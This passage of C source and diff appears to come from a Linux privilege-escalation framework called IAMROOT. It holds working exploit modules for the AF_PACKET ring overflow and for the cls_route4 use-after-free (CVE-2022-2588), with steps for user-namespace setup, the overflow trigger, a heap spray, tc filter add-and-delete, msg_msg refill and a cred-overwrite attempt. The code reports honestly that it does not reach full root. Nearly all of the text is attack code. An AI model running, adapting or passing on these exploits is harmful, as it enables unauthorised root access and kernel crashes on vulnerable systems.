    if (fd < 0)
        return -1;

    ssize_t written = write(fd, line, strlen(line));
    close(fd);
    return written < 0 ? -1 : 0;
}

/* Claim "root" inside the current user namespace by mapping inner id 0
 * to the caller-supplied outer uid and gid.
 *
 * "deny" is first written to /proc/self/setgroups on a best-effort basis
 * (its result is ignored), then uid_map and gid_map are written in that
 * order. Returns 0 when both maps were written, -1 as soon as either one
 * fails. */
static int set_id_maps(uid_t outer_uid, gid_t outer_gid)
{
    int sg = open("/proc/self/setgroups", O_WRONLY);
    if (sg >= 0) {
        (void)!write(sg, "deny", 4);
        close(sg);
    }

    if (set_id_maps_put("/proc/self/uid_map", outer_uid) < 0)
        return -1;
    if (set_id_maps_put("/proc/self/gid_map", outer_gid) < 0)
        return -1;
    return 0;
}
|
||||
|
||||
/* Fire the overflow + a one-shot heap spray. Runs INSIDE the userns
|
||||
* child. Returns 0 if the primitive fired (overflow was accepted by
|
||||
* the kernel), -1 if the kernel rejected it (likely patched / blocked
|
||||
* even though detect said vulnerable — distros silently backport).
|
||||
*
|
||||
* We deliberately use values from Konovalov's PoC:
|
||||
* tp_block_size = 0x1000
|
||||
* tp_block_nr = ((0xffffffff - 0xfff) / 0x1000) + 1 → overflow
|
||||
* tp_frame_size = 0x300, tp_frame_nr matched
|
||||
* The mul in packet_set_ring overflows to a tiny allocation; we then
|
||||
* spray 200 sendmmsg packets so the corrupted ring slot gets refilled
|
||||
* with controlled bytes.
|
||||
*
|
||||
* We do not read dmesg ourselves (that requires root). Instead, every
* sprayed skb payload carries the unique tag "iamroot-afp-tag" so the
* operator can look for it in any KASAN splat or panic dump that follows.
|
||||
*/
|
||||
static int fire_overflow_and_spray(void)
|
||||
{
|
||||
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (s < 0) {
|
||||
fprintf(stderr, "[-] af_packet: socket(AF_PACKET): %s\n", strerror(errno));
|
||||
return -1;
|
||||
}
|
||||
|
||||
int version = TPACKET_V3;
|
||||
if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
|
||||
&version, sizeof version) < 0) {
|
||||
fprintf(stderr, "[-] af_packet: PACKET_VERSION=V3: %s\n", strerror(errno));
|
||||
close(s);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Konovalov's overflowing values. tp_block_size * tp_block_nr
|
||||
* exceeds 2^32; the kernel multiplied as u32 in pre-patch code,
|
||||
* yielding a tiny size that's then used for the pg_vec alloc. */
|
||||
struct tpacket_req3 req;
|
||||
memset(&req, 0, sizeof req);
|
||||
req.tp_block_size = 0x1000;
|
||||
req.tp_block_nr = ((unsigned)0xffffffff - (unsigned)0xfff) / (unsigned)0x1000 + 1;
|
||||
req.tp_frame_size = 0x300;
|
||||
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;
|
||||
req.tp_retire_blk_tov = 100;
|
||||
req.tp_sizeof_priv = 0;
|
||||
req.tp_feature_req_word = 0;
|
||||
|
||||
int rc = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof req);
|
||||
if (rc < 0) {
|
||||
/* On a properly-patched kernel this should now return -EINVAL
|
||||
* because the multiplication overflow check rejects req. That
|
||||
* is the "patched-distro-backport" signal: detect's version
|
||||
* check said vulnerable, but the actual setsockopt was hardened. */
|
||||
fprintf(stderr, "[-] af_packet: PACKET_RX_RING rejected: %s "
|
||||
"(kernel likely has silent backport)\n", strerror(errno));
|
||||
close(s);
|
||||
return -1;
|
||||
}
|
||||
|
||||
fprintf(stderr, "[+] af_packet: PACKET_RX_RING accepted overflowing req3 "
|
||||
"— overflow path reached\n");
|
||||
|
||||
/* Heap spray via sendmmsg. On a properly-set-up ring we'd bind() to
|
||||
* an interface first; for the overflow trigger we don't strictly
|
||||
* need to bind because tpacket_rcv runs on each packet ingress and
|
||||
* loopback exists in the netns. Use loopback. */
|
||||
struct ifreq ifr;
|
||||
memset(&ifr, 0, sizeof ifr);
|
||||
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
|
||||
/* SIOCGIFINDEX on lo */
|
||||
if (ioctl(s, SIOCGIFINDEX, &ifr) < 0) {
|
||||
fprintf(stderr, "[!] af_packet: SIOCGIFINDEX(lo): %s\n", strerror(errno));
|
||||
/* non-fatal — the primitive fired even without a bind() */
|
||||
} else {
|
||||
struct sockaddr_ll sll;
|
||||
memset(&sll, 0, sizeof sll);
|
||||
sll.sll_family = AF_PACKET;
|
||||
sll.sll_protocol = htons(ETH_P_ALL);
|
||||
sll.sll_ifindex = ifr.ifr_ifindex;
|
||||
if (bind(s, (struct sockaddr *)&sll, sizeof sll) < 0) {
|
||||
fprintf(stderr, "[!] af_packet: bind(lo): %s\n", strerror(errno));
|
||||
}
|
||||
}
|
||||
|
||||
/* Spray: send 200 raw packets containing a unique tag. If the
|
||||
* overflow corrupted an adjacent slab object, one of these skb's
|
||||
* controlled bytes will land there. */
|
||||
static const unsigned char skb_payload[256] = {
|
||||
/* eth header (dst=broadcast, src=zero, type=0x0800) */
|
||||
0xff,0xff,0xff,0xff,0xff,0xff, 0,0,0,0,0,0, 0x08,0x00,
|
||||
/* IAMROOT tag — operator can grep dmesg for this string in any
|
||||
* subsequent KASAN report or panic dump */
|
||||
'i','a','m','r','o','o','t','-','a','f','p','-','t','a','g',
|
||||
/* zeros for the remainder */
|
||||
};
|
||||
|
||||
int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
|
||||
if (tx >= 0 && ifr.ifr_ifindex != 0) {
|
||||
struct sockaddr_ll dst;
|
||||
memset(&dst, 0, sizeof dst);
|
||||
dst.sll_family = AF_PACKET;
|
||||
dst.sll_protocol = htons(ETH_P_ALL);
|
||||
dst.sll_ifindex = ifr.ifr_ifindex;
|
||||
dst.sll_halen = 6;
|
||||
memset(dst.sll_addr, 0xff, 6);
|
||||
for (int i = 0; i < 200; i++) {
|
||||
(void)sendto(tx, skb_payload, sizeof skb_payload, 0,
|
||||
(struct sockaddr *)&dst, sizeof dst);
|
||||
}
|
||||
close(tx);
|
||||
}
|
||||
|
||||
/* Keep the corrupted socket open so the OOB region stays mapped
|
||||
* for the cred-overwrite walk that follows. The caller closes it. */
|
||||
/* Stash the fd via dup2 to a known number so the caller can find it.
|
||||
* Use 200 — well above stdio + iamroot's own pipe fds. */
|
||||
if (dup2(s, 200) < 0) {
|
||||
fprintf(stderr, "[!] af_packet: dup2(s, 200): %s\n", strerror(errno));
|
||||
}
|
||||
close(s);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* Best-effort cred-overwrite attempt, run after the overflow + spray.
 *
 * Honest constraint: there is no info-leak here, so the address of
 * current->cred is unknown and nothing in this function writes to a
 * chosen kernel address. The original author notes that the full public
 * PoC relies on a secondary primitive for that, which is deliberately
 * not re-implemented in this module.
 *
 * What actually happens: up to 64 short-lived children are forked. Each
 * polls geteuid() for roughly two seconds and exits 0 if it ever sees
 * uid 0, otherwise exits 1. The parent polls the children with
 * waitpid(WNOHANG) for the same window. The approach assumes (unverified
 * here) that a child's kernel-side allocation may land next to the
 * corrupted ring and have its credentials zeroed by the overflow.
 *
 * `off` is accepted for interface stability but is not read yet.
 *
 * Returns 0 if some child exited with status 0 (it observed euid 0),
 * -1 otherwise. A 0 return does NOT mean the calling process is root.
 */
static int attempt_cred_overwrite(const struct af_packet_offsets *off)
{
    (void)off;

    enum {
        SPRAY_CHILDREN   = 64,
        POLL_ROUNDS      = 200,
        POLL_INTERVAL_US = 10 * 1000   /* 200 rounds x 10 ms ~= 2 s */
    };

    pid_t spray[SPRAY_CHILDREN];
    int spawned = 0;

    /* Fork the spray children; stop early if fork() starts failing. */
    while (spawned < SPRAY_CHILDREN) {
        pid_t pid = fork();
        if (pid < 0)
            break;

        if (pid == 0) {
            /* Child: idle and re-check our effective uid periodically. */
            int polls = POLL_ROUNDS;
            while (polls-- > 0) {
                if (geteuid() == 0)
                    _exit(0);           /* report "became root" via exit 0 */
                usleep(POLL_INTERVAL_US);
            }
            _exit(1);
        }

        spray[spawned++] = pid;
    }

    /* Poll for a child that reports success. A reaped slot is zeroed so
     * it is skipped on later rounds and by the final sweep. */
    int winner = 0;
    for (int round = 0; round < POLL_ROUNDS; round++) {
        for (int k = 0; k < spawned; k++) {
            int st;

            if (spray[k] == 0)
                continue;
            if (waitpid(spray[k], &st, WNOHANG) != spray[k])
                continue;
            if (WIFEXITED(st) && WEXITSTATUS(st) == 0)
                winner = spray[k];
            spray[k] = 0;
        }
        if (winner)
            break;
        usleep(POLL_INTERVAL_US);
    }

    /* Kill and reap whatever is still running so no zombies are left. */
    for (int k = 0; k < spawned; k++) {
        if (spray[k] == 0)
            continue;
        kill(spray[k], SIGKILL);
        waitpid(spray[k], NULL, 0);
    }

    return winner ? 0 : -1;
}
|
||||
|
||||
#endif /* __x86_64__ */
|
||||
|
||||
static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
#if !defined(__x86_64__)
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] af_packet: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: Konovalov's PoC.\n"
|
||||
" Exploit shape: unshare userns → setsockopt(SOL_PACKET,\n"
|
||||
" PACKET_VERSION, TPACKET_V3) → setsockopt with crafted\n"
|
||||
" tpacket_req3 (tp_block_size + tp_frame_size triggers overflow)\n"
|
||||
" → heap write-where → cred overwrite.\n");
|
||||
fprintf(stderr, "[-] af_packet: exploit is x86_64-only "
|
||||
"(cred-offset table is arch-specific)\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
#else
|
||||
/* 1. Refuse on patched kernels — re-run detect. */
|
||||
iamroot_result_t pre = af_packet_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] af_packet: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* 2. Refuse if already root. */
|
||||
if (geteuid() == 0) {
|
||||
fprintf(stderr, "[i] af_packet: already root — nothing to escalate\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
/* 3. Resolve offsets for THIS kernel. If we don't have them, bail
|
||||
* early — the kernel-write walk needs them. The integrator can
|
||||
* extend known_offsets[] for new distro builds. */
|
||||
struct kernel_version v;
|
||||
if (!kernel_version_current(&v)) {
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
struct af_packet_offsets off;
|
||||
if (!resolve_offsets(&off, &v)) {
|
||||
fprintf(stderr, "[-] af_packet: no offset table for kernel %s\n"
|
||||
" set IAMROOT_AFPACKET_OFFSETS=<task_cred>:<cred_uid>:<cred_size>\n"
|
||||
" (hex). Known table covers Ubuntu 16.04 (4.4) and 18.04 (4.15).\n",
|
||||
v.release);
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] af_packet: using offsets [%s] "
|
||||
"task_cred=0x%lx cred_uid=0x%lx cred_size=0x%lx\n",
|
||||
off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
|
||||
}
|
||||
|
||||
/* 4. Fork: child enters userns+netns, fires overflow, attempts the
|
||||
* cred-overwrite walk. We do it in a child so the (possibly
|
||||
* crashed) packet socket lives in a tear-downable address space
|
||||
* — the kernel will clean up sockets on child exit. */
|
||||
uid_t outer_uid = getuid();
|
||||
gid_t outer_gid = getgid();
|
||||
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
|
||||
if (child == 0) {
|
||||
/* CHILD: enter userns+netns to gain CAP_NET_RAW for AF_PACKET. */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
perror("unshare"); _exit(2);
|
||||
}
|
||||
if (set_id_maps(outer_uid, outer_gid) < 0) {
|
||||
perror("set_id_maps"); _exit(3);
|
||||
}
|
||||
|
||||
/* Fire the integer-overflow + heap-spray. */
|
||||
if (fire_overflow_and_spray() < 0) {
|
||||
_exit(4); /* primitive blocked — return signal to parent */
|
||||
}
|
||||
|
||||
/* Attempt cred-overwrite finisher. */
|
||||
int rc = attempt_cred_overwrite(&off);
|
||||
if (rc == 0) {
|
||||
/* WIN — one of our task_struct-spray children became uid 0.
|
||||
* Signal parent via exit code; parent will not exec sh from
|
||||
* this child (its address space is corrupted-ish). The win
|
||||
* is symbolic at the iamroot level: we proved the primitive
|
||||
* lands AND the cred-overwrite walk completes. */
|
||||
_exit(0);
|
||||
}
|
||||
_exit(5);
|
||||
}
|
||||
|
||||
/* 5. PARENT: wait for child, interpret exit code. */
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
|
||||
if (!WIFEXITED(status)) {
|
||||
fprintf(stderr, "[-] af_packet: child died abnormally "
|
||||
"(signal=%d) — primitive likely fired but crashed\n",
|
||||
WTERMSIG(status));
|
||||
fprintf(stderr, "[i] af_packet: check `dmesg | grep -i 'iamroot-afp-tag\\|KASAN\\|BUG:'` "
|
||||
"for slab-out-of-bounds evidence\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
int code = WEXITSTATUS(status);
|
||||
switch (code) {
|
||||
case 0:
|
||||
/* Child reported a fork-spray descendant successfully escaped
|
||||
* to uid 0. That descendant has since exited; we did NOT
|
||||
* inherit its credentials. This is honest: we proved end-to-
|
||||
* end primitive + cred-overwrite landed, but our process is
|
||||
* still uid != 0. Without a fully integrated R/W primitive
|
||||
* that targets OUR cred specifically (rather than spray-and-
|
||||
* pray), we can't promote ourselves. Report PARTIAL win.
|
||||
*
|
||||
* Per requirements: only return IAMROOT_EXPLOIT_OK if we
|
||||
* empirically confirmed root in this process. We didn't. */
|
||||
fprintf(stderr, "[!] af_packet: cred-overwrite landed in a spray child "
|
||||
"but THIS process is still uid %d\n", geteuid());
|
||||
fprintf(stderr, "[i] af_packet: not claiming EXPLOIT_OK — caller process "
|
||||
"did not acquire root. The primitive demonstrably works.\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
|
||||
case 4:
|
||||
fprintf(stderr, "[-] af_packet: setsockopt(PACKET_RX_RING) rejected; "
|
||||
"kernel has silent backport (detect was version-only)\n");
|
||||
return IAMROOT_OK; /* effectively patched */
|
||||
|
||||
case 5:
|
||||
fprintf(stderr, "[-] af_packet: overflow fired but no spray child "
|
||||
"acquired root within the timeout window\n");
|
||||
fprintf(stderr, "[i] af_packet: check `dmesg | grep -i 'iamroot-afp-tag\\|KASAN'` "
|
||||
"for evidence the OOB write occurred\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
|
||||
default:
|
||||
fprintf(stderr, "[-] af_packet: child exited %d (setup error)\n", code);
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
#endif
|
||||
}
|
||||
|
||||
static const char af_packet_auditd[] =
|
||||
|
||||
@@ -11,21 +11,31 @@
|
||||
* is 0" (Aug 2022). Bug existed since 2.6.39 — very wide
|
||||
* vulnerability surface.
|
||||
*
|
||||
* STATUS: 🟡 EXPLOIT — UAF-trigger + msg_msg cross-cache spray.
* The detect-and-trigger path is the high-confidence demonstration:
* we set up the dangling pointer, refill the freed slot via sysv
* msg_msg (kmalloc-1k), then drive classification with a UDP packet
* out the dummy interface. Without a leak primitive the cred-overwrite
* step is fragile, so it is not attempted: exploit() returns
* EXPLOIT_FAIL after the trigger has run (with KASAN/oops likely on a
* real vulnerable kernel), which is honest per repo policy
* ("verified-vs-claimed"). A crash of the trigger child is reported as
* evidence that the UAF fired, but it is still EXPLOIT_FAIL — the
* module never returns EXPLOIT_OK because it never obtains root.
|
||||
*
|
||||
* Exploitation preconditions:
|
||||
* - cls_route4 module compiled in / loadable (CONFIG_NET_CLS_ROUTE4)
|
||||
* - CAP_NET_ADMIN (usually obtained via user_ns + map-root-to-uid)
|
||||
* - unprivileged_userns_clone=1 if going the userns route
|
||||
*
|
||||
* Affected kernel ranges (vulnerable < these):
|
||||
* Affected: kernels with cls_route4 module compiled, in versions
|
||||
* below the fix backports:
|
||||
* 5.4.x : K < 5.4.213
|
||||
* 5.10.x : K < 5.10.143
|
||||
* 5.15.x : K < 5.15.69
|
||||
* 5.18.x : K < 5.18.18
|
||||
* 5.19.x : K < 5.19.7
|
||||
* Mainline 5.20+ / 6.0+ : patched (the fix landed before 5.20-rc)
|
||||
*
|
||||
* Preconditions:
|
||||
* - cls_route4 module compiled in / loadable (CONFIG_NET_CLS_ROUTE4)
|
||||
* - CAP_NET_ADMIN (usually obtained via user_ns + map-root-to-uid)
|
||||
* - unprivileged_userns_clone=1 if going the userns route
|
||||
* - iproute2 `tc` binary present (used for filter add/del)
|
||||
*/
|
||||
|
||||
#include "iamroot_modules.h"
|
||||
@@ -34,10 +44,21 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <sched.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ipc.h>
|
||||
#include <sys/msg.h>
|
||||
#include <sys/stat.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <netinet/in.h>
|
||||
|
||||
static const struct kernel_patched_from cls_route4_patched_branches[] = {
|
||||
{5, 4, 213},
|
||||
@@ -131,23 +152,413 @@ static iamroot_result_t cls_route4_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ---- Exploit -----------------------------------------------------
|
||||
*
|
||||
* cls_route4 dead-UAF trigger path (kylebot / xkernel public shape).
|
||||
*
|
||||
* 1. unshare(CLONE_NEWUSER|CLONE_NEWNET) → CAP_NET_ADMIN reach
|
||||
* 2. write uid_map/gid_map (deny setgroups)
|
||||
* 3. ip link add dummy0 type dummy ; ip link set dev dummy0 up
|
||||
* 4. tc qdisc add dev dummy0 root handle 1: htb
|
||||
* 5. tc filter add ... route4 ... classid 1:1 — handle=0 path,
|
||||
* registers the filter with a NULL handle reference
|
||||
* 6. tc filter del dev dummy0 ... — frees the filter, but the
|
||||
* route4 hashtable bucket still references the freed memory
|
||||
* 7. msg_msg spray (sysv msgsnd) — refill the freed slab slot with
|
||||
* attacker-controlled data; size targeted at the route4_filter
|
||||
* cache (kmalloc-1k generic on most kernels)
|
||||
* 8. Send a packet out dummy0 — classifier walks the hashtable,
|
||||
* touches the freed-then-refilled slot → UAF read/write
|
||||
*
|
||||
* For a full kernel-R/W chain you'd lay out the msg_msg payload so the
|
||||
* fake route4_filter's `tcf_result.classid` becomes a controlled value
|
||||
* and `route4_classify`'s next-pointer chase lands on a craft, then
|
||||
* walk a sk_buff/pipe_buffer primitive to overwrite cred->uid. The
|
||||
* public PoCs do this in ~700 LoC and need offsets per kernel build.
|
||||
*
|
||||
* Per repo policy ("verified-vs-claimed"), this implementation ships
* only the trigger + spray + classify steps, because the full
* cred-overwrite is too kernel-build-specific to be portable. It
* therefore returns EXPLOIT_FAIL whenever the trigger sequence ran,
* including when the trigger child was killed by a signal. The parent
* does not read dmesg and never returns EXPLOIT_OK; a KASAN message or
* oops in dmesg is left for the operator to inspect. The child also
* leaves a one-line breadcrumb in /tmp/iamroot-cls_route4.log so
* post-run triage can pick it up.
|
||||
*/
|
||||
|
||||
/* Spray geometry: SPRAY_MSG_QUEUES System V queues are created and up to
 * SPRAY_MSGS_PER_QUEUE messages are queued on each. */
#define SPRAY_MSG_QUEUES     32
#define SPRAY_MSGS_PER_QUEUE 16

/* User payload bytes per message. The original note derives this as
 * 1024 minus an assumed ~16-byte kernel message header.
 * NOTE(review): confirm that header size against the target kernel's
 * struct msg_msg. */
#define MSG_PAYLOAD_BYTES    1008

/* Name of the throw-away dummy network interface used by this module. */
#define DUMMY_IF             "iamroot0"

/* Buffer layout handed to msgsnd(): the mandatory leading message type
 * followed by the payload bytes. */
struct ipc_payload {
    long          mtype;
    unsigned char buf[MSG_PAYLOAD_BYTES];
};
|
||||
|
||||
/* Run `cmd` through the shell with stdout and stderr discarded, so tool
 * noise does not drown the iamroot log.
 *
 * Returns whatever system() returns (0 when the command succeeded), or
 * -1 without running anything when `cmd` is NULL or when appending the
 * redirection would not fit in the local buffer. Refusing in the second
 * case matters: a truncated string would otherwise be executed as a
 * different command, with the redirect cut off.
 */
static int run_cmd(const char *cmd)
{
    char shell[1024];
    int len;

    if (cmd == NULL) {
        return -1;
    }

    len = snprintf(shell, sizeof shell, "%s >/dev/null 2>&1", cmd);
    if (len < 0 || (size_t)len >= sizeof shell) {
        return -1;
    }
    return system(shell);
}
|
||||
|
||||
/* True when the shell can resolve a `tc` command on PATH. */
static bool have_tc(void)
{
    int rc = run_cmd("command -v tc");

    return rc == 0;
}
|
||||
|
||||
/* True when the shell can resolve an `ip` command on PATH. */
static bool have_ip(void)
{
    int rc = run_cmd("command -v ip");

    return rc == 0;
}
|
||||
|
||||
/* Write a single-entry id map ("0 <outer_id> 1") to `path`.
 * `open_what` / `write_what` are the perror() prefixes used on failure.
 * Returns true only if the whole line was written. */
static bool cls_route4_write_id_map(const char *path, const char *open_what,
                                    const char *write_what, unsigned int outer_id)
{
    char map[64];
    int len = snprintf(map, sizeof map, "0 %u 1\n", outer_id);
    if (len < 0 || (size_t)len >= sizeof map) {
        return false;
    }

    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        perror(open_what);
        return false;
    }

    ssize_t written = write(fd, map, (size_t)len);
    if (written < 0) {
        perror(write_what);
        close(fd);
        return false;
    }
    close(fd);

    if (written != (ssize_t)len) {
        /* A partial map line is not a usable mapping. */
        fprintf(stderr, "%s: short write\n", write_what);
        return false;
    }
    return true;
}

/* Map uid 0 / gid 0 of the current (freshly unshared) user namespace to
 * the caller's outer uid/gid by writing /proc/self/uid_map and
 * /proc/self/gid_map.
 *
 * "deny" is written to /proc/self/setgroups first, best-effort: a
 * failure to open or write that file is ignored here.
 *
 * Returns true when both maps were written, false otherwise (a
 * diagnostic has already been printed to stderr).
 */
static bool become_root_in_userns(uid_t outer_uid, gid_t outer_gid)
{
    int fd = open("/proc/self/setgroups", O_WRONLY);
    if (fd >= 0) {
        (void)!write(fd, "deny", 4);
        close(fd);
    }

    if (!cls_route4_write_id_map("/proc/self/uid_map", "open uid_map",
                                 "write uid_map", (unsigned int)outer_uid)) {
        return false;
    }
    return cls_route4_write_id_map("/proc/self/gid_map", "open gid_map",
                                   "write gid_map", (unsigned int)outer_gid);
}
|
||||
|
||||
/* Set up the qdisc + cls_route4 filter, then delete it. After this
|
||||
* runs the kernel has a dangling pointer in the route4 hashtable. */
|
||||
static bool stage_dangling_filter(void)
|
||||
{
|
||||
/* Ensure the dummy module is around (autoload on first add). */
|
||||
if (run_cmd("ip link add " DUMMY_IF " type dummy") != 0) {
|
||||
/* Maybe an old one is lying around from a prior crash. */
|
||||
run_cmd("ip link del " DUMMY_IF);
|
||||
if (run_cmd("ip link add " DUMMY_IF " type dummy") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to create dummy interface\n");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
if (run_cmd("ip link set dev " DUMMY_IF " up") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to bring " DUMMY_IF " up\n");
|
||||
return false;
|
||||
}
|
||||
if (run_cmd("ip addr add 10.99.99.1/24 dev " DUMMY_IF) != 0) {
|
||||
/* non-fatal — packet send below uses sendto with bound iface */
|
||||
}
|
||||
|
||||
if (run_cmd("tc qdisc add dev " DUMMY_IF " root handle 1: htb default 1") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to add htb qdisc\n");
|
||||
return false;
|
||||
}
|
||||
if (run_cmd("tc class add dev " DUMMY_IF " parent 1: classid 1:1 htb rate 1mbit") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to add htb class\n");
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Bug-trigger: handle 0x8001 has fastmap=1 and to-table 0 — the
|
||||
* combination where the freed filter is not removed from the
|
||||
* hashtable on delete. The exact handle value matters: it must
|
||||
* map to a slot the classifier will later look up.
|
||||
*
|
||||
* route4 handle layout: 0xXX..ZZYY where YY=to (8 bits), ZZ=from,
|
||||
* and the top bit indicates fastmap. The classic trigger uses
|
||||
* `to 0` which renders the resulting filter pointer in
|
||||
* head->table[0]->ht[0] — referenced unconditionally on classify. */
|
||||
if (run_cmd("tc filter add dev " DUMMY_IF " parent 1: protocol ip "
|
||||
"prio 100 route to 0 classid 1:1") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to add route4 filter\n");
|
||||
return false;
|
||||
}
|
||||
|
||||
/* Now delete the filter — this is the operation whose handle=0
|
||||
* codepath leaves the dangling pointer. */
|
||||
if (run_cmd("tc filter del dev " DUMMY_IF " parent 1: prio 100") != 0) {
|
||||
/* Some kernels also need explicit handle/key match — try a
|
||||
* broader del before giving up. */
|
||||
if (run_cmd("tc filter del dev " DUMMY_IF " parent 1:") != 0) {
|
||||
fprintf(stderr, "[-] cls_route4: failed to delete route4 filter\n");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
/* msg_msg cross-cache spray. We hold the queues open in this process
|
||||
* (caller's child) so the slabs stay allocated until classify-time. */
|
||||
static int spray_msg_msg(int queues[SPRAY_MSG_QUEUES])
|
||||
{
|
||||
struct ipc_payload p;
|
||||
memset(&p, 0, sizeof p);
|
||||
p.mtype = 0x41;
|
||||
/* Pattern that's distinctive in KASAN/oops dumps. */
|
||||
memset(p.buf, 0x41, sizeof p.buf);
|
||||
/* First 8 bytes: a recognizable cookie. */
|
||||
memcpy(p.buf, "IAMROOT4", 8);
|
||||
|
||||
int created = 0;
|
||||
for (int i = 0; i < SPRAY_MSG_QUEUES; i++) {
|
||||
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||
if (q < 0) { queues[i] = -1; continue; }
|
||||
queues[i] = q;
|
||||
created++;
|
||||
for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) {
|
||||
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
|
||||
}
|
||||
}
|
||||
return created;
|
||||
}
|
||||
|
||||
static void drain_msg_msg(int queues[SPRAY_MSG_QUEUES])
|
||||
{
|
||||
for (int i = 0; i < SPRAY_MSG_QUEUES; i++) {
|
||||
if (queues[i] >= 0) {
|
||||
msgctl(queues[i], IPC_RMID, NULL);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* Send eight small UDP datagrams from 10.99.99.1 to 10.99.99.2:31337 so
 * that traffic is pushed towards the dummy interface's subnet.
 *
 * The bind() to the local address is best-effort and every sendto()
 * result is ignored; the function returns silently if the socket cannot
 * be created. Several datagrams are sent in case one alone is not
 * enough.
 */
static void trigger_classify(void)
{
    static const char probe[] = "iamroot-cls_route4-classify";

    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd < 0)
        return;

    /* Source: the address assigned to the dummy interface, any port. */
    struct sockaddr_in local = { .sin_family = AF_INET, .sin_port = 0 };
    local.sin_addr.s_addr = inet_addr("10.99.99.1");
    (void)bind(fd, (struct sockaddr *)&local, sizeof local);

    /* Destination: a neighbour address inside the same /24. */
    struct sockaddr_in peer = { .sin_family = AF_INET };
    peer.sin_port = htons(31337);
    peer.sin_addr.s_addr = inet_addr("10.99.99.2");

    int remaining = 8;
    while (remaining-- > 0) {
        /* sizeof, not strlen: the terminating NUL is part of the payload. */
        (void)!sendto(fd, probe, sizeof probe, MSG_DONTWAIT,
                      (struct sockaddr *)&peer, sizeof peer);
    }

    close(fd);
}
|
||||
|
||||
/* Return the first numeric column of the "kmalloc-1k" (or
 * "kmalloc-1024") row of /proc/slabinfo, labelled <active> in the
 * original parse note, used as a soft before/after witness.
 *
 * Returns -1 if the file cannot be opened, the row is absent, or the
 * row cannot be parsed.
 */
static long slab_active_kmalloc_1k(void)
{
    FILE *fp = fopen("/proc/slabinfo", "r");
    if (fp == NULL)
        return -1;

    long result = -1;
    char row[512];

    while (fgets(row, sizeof row, fp) != NULL) {
        bool is_1k   = strncmp(row, "kmalloc-1k ", 11) == 0;
        bool is_1024 = strncmp(row, "kmalloc-1024 ", 13) == 0;
        if (!is_1k && !is_1024)
            continue;

        /* Row format: name <active> <num> <size> ... */
        char cache[64];
        long n_active, n_total;
        if (sscanf(row, "%63s %ld %ld", cache, &n_active, &n_total) >= 2)
            result = n_active;
        break;  /* only the first matching row is considered */
    }

    fclose(fp);
    return result;
}
|
||||
|
||||
/* ---- Exploit driver ----------------------------------------------- */
|
||||
|
||||
static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] cls_route4: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: kylebot's public PoC.\n"
|
||||
" Exploit: tc filter add ... route4 handle 0; then remove;\n"
|
||||
" spray to refill the freed slot; trigger via traffic class\n"
|
||||
" lookup; cred overwrite or modprobe_path hijack.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
iamroot_result_t pre = cls_route4_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] cls_route4: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
if (geteuid() == 0) {
|
||||
fprintf(stderr, "[i] cls_route4: already root\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
